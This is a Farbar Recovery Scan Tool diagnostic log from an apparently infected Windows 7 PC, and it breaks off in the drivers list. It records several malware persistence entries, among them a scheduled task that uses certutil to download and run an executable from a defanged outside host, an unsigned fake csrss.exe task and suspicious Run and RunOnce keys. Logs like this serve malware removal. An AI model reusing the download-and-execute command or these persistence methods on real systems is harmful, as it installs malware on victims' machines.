Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-09-2020Ran by Ohm (administrator) on 4WATT (01-10-2020 01:24:55)Running from C:\Users\Ohm\DesktopLoaded Profiles: OhmPlatform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)Default browser: FFBoot Mode: NormalTutorial for Farbar Recovery Scan Tool: -scan-tool/==================== Processes (Whitelisted) =================(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)() [File not signed] C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\IOMonitorSrv.exe(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atieclxx.exe(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe(Advanced Micro Devices, Inc.) [File not signed] C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe(ASUSTeK Computer Inc.) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtWLan.exe(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe(cFos Software GmbH -> cFos Software GmbH) C:\Program Files\ASRock\XFast LAN\cfosspeed.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\EFRService.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\Remediation\RemediationService.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\Threat Emulation\TESvc.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAAR.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ICM\ICM-Service-NET.exe(Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe(Comodo Security Solutions -> Comodo) [File not signed] C:\Program Files\Comodo\Dragon\dragon_updater.exe(GOLD CLICK LIMITED -> Gold Click Ltd) C:\Program Files (x86)\ProxyGate\Cloud.exe(GOLD CLICK LIMITED -> Gold Click Ltd) C:\Program Files (x86)\ProxyGate\PGChk.exe(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Scheduler.exe(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\Pub\PubMonitor.exe(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\schtasks.exe(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe(Power Software Ltd) [File not signed] C:\Program Files\PowerISO\PWRISOVM.EXE(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe(Realtek Semiconductor Corp.) [File not signed] C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlService.exe==================== Registry (Whitelisted) ===================(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-10-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor)HKLM\...\Run: [XFast LAN] => C:\Program Files\ASRock\XFast LAN\cFosSpeed.exe [2009952 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [441856 2017-10-24] (Power Software Ltd) [File not signed]HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [34672 2008-06-12] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)HKLM-x32\...\Run: [ZoneAlarm] => C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe [325856 2020-01-23] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)HKLM-x32\...\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [71568 2020-01-04] (Cole Williams Software Limited -> )HKLM-x32\...\Run: [ZaAntiRansomware] => C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAAR.exe [4230368 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)HKLM\...\RunOnce: [dig1ubm3cpg] => C:\Program Files (x86)\wcze\206367889.exe [508416 2020-09-05] () [File not signed]HKU\S-1-5-21-546064741-869659242-2245885051-1000\...\Run: [Advanced SystemCare] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3636496 2020-03-06] (IObit Information Technology -> IObit)HKU\S-1-5-21-546064741-869659242-2245885051-1000\...\Run: [Ohm] => explorer.exe hxxp://exinariuminix.info C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe [549376 2020-09-05] () [File not signed] CANON INC.)HKLM\...\Print\Monitors\BJ Language Monitor4: C:\Windows\system32\CNBLM4.DLL [267776 2009-07-14] (Microsoft Windows -> CANON INC.)HKLM\Software\Microsoft\Active Setup\Installed Components: [AFE6A462-C574-4B8A-AF43-4CC60DF4563B] -> C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\85.1.14.84\Installer\chrmstp.exe [2020-09-23] (Brave Software, Inc. -> Brave Software, Inc.)HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [8A69D345-D564-463c-AFF1-A69D9E530F96] -> "C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-levelHKLM\Software\...\Authentication\Credential Providers: [3AFAB1A7-F3DB-4DED-B51B-25E34D21D798] -> C:\Windows\system32\USBKeyCredentialProvider.dll [2013-07-25] (ASROCK Incorporation -> )Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2020-01-19]ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )Startup: C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guard.lnk [2020-09-05]ShortcutTarget: Guard.lnk -> C:\Users\Ohm\AppData\Roaming\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Guard.exe (Microsoft) [File not signed]CHR HKLM\SOFTWARE\Policies\Google: Restriction C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)Task: 1388E392-B751-40F1-BF63-7465A6EB2BF0 - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [468992 2019-03-13] (Advanced Micro Devices, Inc.) [File not signed]Task: 1CB47F2B-406C-42F6-B50C-3D9941839930 - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-02-08] (Google Inc -> Google Inc.)Task: 366DB73E-E78B-4751-BC71-A89166259168 - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\AsrSP.exe [2461960 2014-05-27] (ASROCK Incorporation -> )Task: 588065B8-4CEF-4E74-89A9-A708740CA49D - System32\Tasks\Maxthon5 Update => C:\Program Files (x86)\Maxthon5\Bin\Maxthon.exe [170776 2020-02-25] (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)Task: 5E930F89-6898-42C6-A72D-142726432837 - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-02-08] (Google Inc -> Google Inc.)Task: 5FE0D1D6-CA49-45A5-9EC7-FE123B4F0469 - System32\Tasks\C42FAC67-7005-46AC-A428-6A5D06984B65 => C:\Windows\system32\pcalua.exe -a C:\Wipefile\WipeFile.exe -d C:\WipefileTask: 62AD2886-BD33-4DF4-ABCD-2270C19B3350 - System32\Tasks\40562C5C-A501-4E71-A94F-0CC76CBA9725 => C:\Windows\system32\pcalua.exe -a "D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\EAUninstall.exe"Task: 70DC3C2D-AAB0-4333-820C-C9BD2BBDA272 - System32\Tasks\Games\UpdateCheck_S-1-5-21-546064741-869659242-2245885051-1000 => CA22F5B1-E06F-4A2B-94FC-21E87FE53781 C:\Windows\System32\gameux.dll [2746368 2016-04-19] (Microsoft Windows -> Microsoft Corporation)Task: 92261E53-DB85-44D4-9F21-195C31A1B4D7 - System32\Tasks\EBC6E330-304C-4DE2-9C7D-65FF1CD54893 => C:\Windows\system32\pcalua.exe -a F:\SETUP.EXE -d F:\Task: 94E8E451-1F02-4B2D-92A7-500BD5E86407 - System32\Tasks\Driver Booster SkipUAC (Ohm) => C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DriverBooster.exe [7424272 2019-02-19] (IObit Information Technology -> IObit)Task: 9AD14568-CE1B-4F5C-ACC3-F850C825CEC7 - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_pepper.exe [1497656 2020-09-09] (Adobe Inc. -> Adobe)Task: A12B0AAB-E424-4129-86D2-B6D4B90BFBCD - System32\Tasks\968E5A7B-F380-48CF-9963-F59954BAF532 => C:\Windows\system32\pcalua.exe -a C:\Windows\DIIUnin.exe -c C:\Windows\DIIUnin.datTask: A7D5EBA9-DC71-4C8B-9428-A8369FFF8361 - System32\Tasks\Uninstaller_SkipUac_Ohm => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [6041360 2020-07-08] (IObit Information Technology -> IObit)Task: ABD8FE44-F99B-4A1A-9936-07E4B977AD2B - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [123600 2020-07-30] (Mozilla Corporation -> Mozilla Foundation)Task: B77AF2B6-D345-4D19-8644-B6E6C8759059 - System32\Tasks\ADC85419-F2DF-47EA-919B-08E5AF637BE1 => C:\Windows\system32\pcalua.exe -a "C:\KITT ENDS!\JAVA!\jre-8u251-windows-i586.exe" -d "C:\KITT ENDS!\JAVA!"Task: B9EB39FE-8A7C-4FFB-9FC0-CB3D9D15E194 - System32\Tasks\844D974E-ACE4-4B35-802B-E31E516B5283 => C:\Windows\system32\pcalua.exe -a "D:\StAllIns!!\GAMES2!!\Command & Conquer!\CnC3 Kanes Wrath\WorldBuilder.exe" -d "D:\StAllIns!!\GAMES2!!\Command & Conquer!\CnC3 Kanes Wrath"Task: C5EA2CF0-651C-4502-B200-4B3AE8226F8F - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [58760 2019-03-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)Task: C86975B4-515F-4E42-8CDD-C9EEA42F2593 - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [468992 2019-03-13] (Advanced Micro Devices, Inc.) [File not signed]Task: C91F2EAE-AC2F-40E2-8819-B210AC2F9211 - System32\Tasks\DFEDADEA-B75E-4109-9752-FBEA26DFE40F => C:\Windows\system32\pcalua.exe -a F:\WinterAssault.exe -d F:\Task: C920CA0D-9D5F-423B-8124-E73719CEBDAE - System32\Tasks\ASC_SkipUac_Ohm => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [8884496 2020-03-26] (IObit Information Technology -> IObit)Task: C958D574-ED9E-424F-B2D0-DADA4F5A739A - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://babsitef.com/app/app.exe C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe /31340 C:\Users\Ohm\AppData\Roaming\Battlefleet.Gothic.Armada.v1.8.10317+3DLC\dttdxdkt.exeTask: D61A4D7D-9025-4EDE-B76D-B461B105E130 - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)Task: DE4C3896-37D1-43EE-A99B-1A3FEBED5A42 - System32\Tasks\FRAPS => C:\Fraps\fraps.exe [2550968 2012-08-30] (Beepa Pty Ltd -> Beepa P/L) [File not signed]Task: E4689906-8CE5-4FE4-9037-CB1C6A1499CA - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exeTask: E708FF18-830A-4206-A150-62F4428D9ED6 - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-09] (Adobe Inc. -> Adobe)Task: EA1CEBF7-3A0B-4D44-92FF-9946EC0374D7 - System32\Tasks\StartCNBM => C:\Program Files\AMD\CNext\CNext\cncmd.exe [58760 2019-03-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)Task: F7C4F3CB-85F6-48BE-9A8A-7D5E45E35E9E - System32\Tasks\1918CEA6-941B-49B5-B05C-B242183C1EBD => C:\Windows\system32\pcalua.exe -a G:\setup.exe -d G:\Task: F7FA602A-068D-43BF-9845-2F0717CB7492 - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Scheduler.exe [149776 2018-12-28] (IObit Information Technology -> IObit)Task: FE95BE9B-48DD-4911-B935-726A26FBF6D2 - System32\Tasks\FF3E8B37-F18A-407C-9CE6-55A13DCC381F => C:\Windows\system32\pcalua.exe -a "D:\GGGottem!\TRAINERS!\TRAINERS!\RA2YR!\AZ Yuri Hack 2.exe" -d D:\GGGottem!\TRAINERS!\TRAINERS!\RA2YR!Task: FF7440FF-5D97-480D-B1A4-A6269A7B4EC8 - System32\Tasks\Ohm => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ohm /t REG_SZ /d "explorer.exe hxxp://exinariuminix.info" hxxps://fitgirl-repacks.siteFF Extension: (Worldwide Radio) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\worldwide@radio.xpi [2020-05-11]FF Extension: (Image Search Options) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\4a313247-8330-4a81-948e-b79936516f78.xpi [2019-10-08]FF Extension: (Flash and Video Download) - C:\Users\Ohm\AppData\Roaming\Mozilla\Firefox\Profiles\s6poxj0c.default\Extensions\adeadebb-fedc-4180-a7f4-cfdd87496551.xpi [2020-06-09]FF ProfilePath: C:\Users\Ohm\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\ltvqy08k.default [2020-09-18]FF SearchPlugin: C:\Users\Ohm\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\ltvqy08k.default\searchplugins\jive-search.xml [2020-09-18]FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)FF Plugin-x32: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-07-20] (Oracle America, Inc. -> Oracle Corporation)FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=3 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=9 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)FF Plugin-x32: BYOND -> C:\Program Files (x86)\BYOND\bin\npbyond.dll [2008-07-09] (BYOND) [File not signed]FF Plugin HKU\S-1-5-21-546064741-869659242-2245885051-1000: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=3 -> C:\Users\Ohm\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2018-04-14] (Google Inc (TEST) -> Epic Privacy Browser) [File not signed]FF Plugin HKU\S-1-5-21-546064741-869659242-2245885051-1000: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=9 -> C:\Users\Ohm\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2018-04-14] (Google Inc (TEST) -> Epic Privacy Browser) [File not signed]Chrome:=======CHR DefaultProfile: DefaultCHR Profile: C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default [2020-09-19]CHR StartupUrls: Default -> "hxxps://us.yahoo.com/?fr=fpc-comodo&type=81_25050030006_77.0.3865.120_u_hp_sp"CHR Extension: (Flash Video Downloader Plus) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\alfnggielnhdpdamedeokgppcilgainm [2020-04-04]CHR Extension: (Full History Keeper) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\cailfpeoajpebgkchjnmpopcileaeklm [2020-09-18]CHR Extension: (Export History/Bookmarks to JSON/CSV*/XLS*) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\dcoegfodcnjofhjfbhegcgjgapeichlf [2020-09-18]CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2020-07-09]CHR Extension: (Flash Downloader) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\eepdaplnjgknikdfmmiihcohocmpmimg [2020-06-18]CHR Extension: (History Saver) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\egmmpalpkmlamglljdhaiclcggaomepi [2020-09-18]CHR Extension: (EditThisCookie) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2020-09-18]CHR Extension: (Awesome Cookie Manager) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcpidejphgpcgfnpiehkcckkkemgneif [2020-09-18]CHR Extension: (Flash Downloader) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoageakflbgkobikeakdpilfejhdaggh [2019-01-16]CHR Extension: (Darkness - Beautiful Dark Themes) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\imilbobhamcfahccagbncamhpnbkaenm [2019-10-08]CHR Extension: (Video Downloader professional) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpaglkhbmbmhlnpnehlffkgaaapoicnk [2019-05-19]CHR Extension: (User Agent Switcher) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\kchfmpdcejfkipopnolndinkeoipnoia [2020-09-18]CHR Extension: (Chrome Web Store Payments) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]CHR Extension: (Chrome Media Router) - C:\Users\Ohm\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-08-27]==================== Services (Whitelisted) ===================(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-09] (Adobe Inc. -> Adobe)R2 AdvancedSystemCareService13; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [1290000 2019-12-27] (IObit Information Technology -> IObit)R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-04-02] (Advanced Micro Devices, Inc.) [File not signed]S3 amdacpusrsvc; C:\Program Files\AMD\920DEC42-4CA5-4d1d-9487-67BE645CDDFC\amdacpusrsvc.exe [190464 2019-03-12] () [File not signed]R2 ASRockIOMon; C:\Program Files (x86)\ASRock Utility\A-Tuning\Bin\IOMonitorSrv.exe [454656 2013-07-25] () [File not signed]S3 AUEPLauncher; C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe [43008 2019-03-12] (AMD) [File not signed]S3 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [154056 2019-03-05] (Brave Software, Inc. -> BraveSoftware Inc.)S3 cFosSpeedS; C:\Program Files\ASRock\XFast LAN\spd.exe [652640 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)R2 CPEFR; C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\EFRService.exe [2825976 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)S3 CpSbaCipolla; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\SBACipollaSrvHost.exe [33016 2019-10-29] (Check Point Software Technologies Ltd. -> )S3 CpSbaUpdater; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\SBACipollaSrvHost.exe [33016 2019-10-29] (Check Point Software Technologies Ltd. -> )R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4506728 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)R2 DragonUpdater; C:\Program Files\Comodo\Dragon\dragon_updater.exe [2971640 2020-07-16] (Comodo Security Solutions -> Comodo) [File not signed]S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1677384 2020-07-21] (GOG Sp. z o.o. -> GOG.com)S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-05-06] (GOG Sp. z o.o. -> GOG.com)S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [156944 2020-07-08] (IObit Information Technology -> IObit)S3 MaskVPNService; C:\Program Files (x86)\MaskVPN\mask_svc.exe [7461816 2020-07-02] (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes Corporation -> Malwarebytes)S2 MxService; C:\Program Files (x86)\Maxthon5\Bin\MxService.exe [178464 2020-02-25] (Maxthon Technology Co, Ltd. -> Maxthon International ltd.)S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd) )S3 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [183112 2020-09-06] (Even Balance, Inc. -> )S3 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [54024 2018-02-21] (ProtonVPN AG -> )R2 Realtek11nCU; C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlService.exe [36864 2012-05-10] (Realtek Semiconductor Corp.) [File not signed]R2 RemediationService; C:\Program Files (x86)\CheckPoint\Endpoint Security\Remediation\RemediationService.exe [18168 2019-11-04] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)R2 TESvc; C:\Program Files (x86)\CheckPoint\Endpoint Security\Threat Emulation\TESvc.exe [301304 2019-11-04] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)S2 vsmon; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [4528344 2020-01-21] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [28760 2019-11-29] (LAVASOFT SOFTWARE CANADA INC -> )R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-04-19] (Microsoft Windows -> Microsoft Corporation)R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () Check Point Software Technologies Ltd.)S3 ZAARUpdateService; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAARUpdateService.exe [51936 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)S3 ZAPrivacyService; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe [114936 2020-01-21] (Check Point Software Technologies Ltd. -> Check Point Software Technologies, Ltd.)S4 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]===================== Drivers (Whitelisted) ===================(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59648 2013-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)R2 AODDriver4.3.0; C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [60104 2015-02-19] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)R3 AscFileFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [27528 2019-07-15] (IObit CO., LTD -> IObit)R3 AscRegistryFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [28064 2019-07-15] (IObit CO., LTD -> IObit)R1 AsrAppCharger; C:\Windows\System32\DRIVERS\AsrAppCharger.sys [17192 2011-11-07] (ASROCK Incorporation -> Windows Win 7 DDK provider)R3 AsrDrv101; C:\Windows\SysWOW64\Drivers\AsrDrv101.sys [22280 2018-02-07] (ASROCK Incorporation -> ASRock Incorporation)R0 AsrRamDisk; C:\Windows\System32\DRIVERS\AsrRamDisk.sys [40200 2013-08-02] (ASROCK Incorporation -> ASRock Inc.)R1 cFosSpeed; C:\Windows\System32\DRIVERS\cfosspeed6.sys [1814880 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)R2 cpbak; C:\Windows\System32\DRIVERS\cpbak.sys [66848 2019-11-05] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)R1 CPEPMon; C:\Windows\System32\DRIVERS\CPEPMon.sys [110880 2019-11-05] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)S3 cpuz145; C:\Windows\temp\cpuz145\cpuz145_x64.sys [49968 2020-04-09] (CPUID -> CPUID)R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [42256 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [59360 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)R1 epnetflt; C:\Windows\system32\drivers\epnetflt.sys [130336 2019-10-06] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)R1 epregflt; C:\Windows\system32\drivers\epregflt.sys [132176 2019-05-01] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2019-03-16] (Martin Malik - REALiX -> REALiX™)S3 iobit_monitor_server; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [14680 2018-07-04] (IObit Information Technology -> IObit)R2 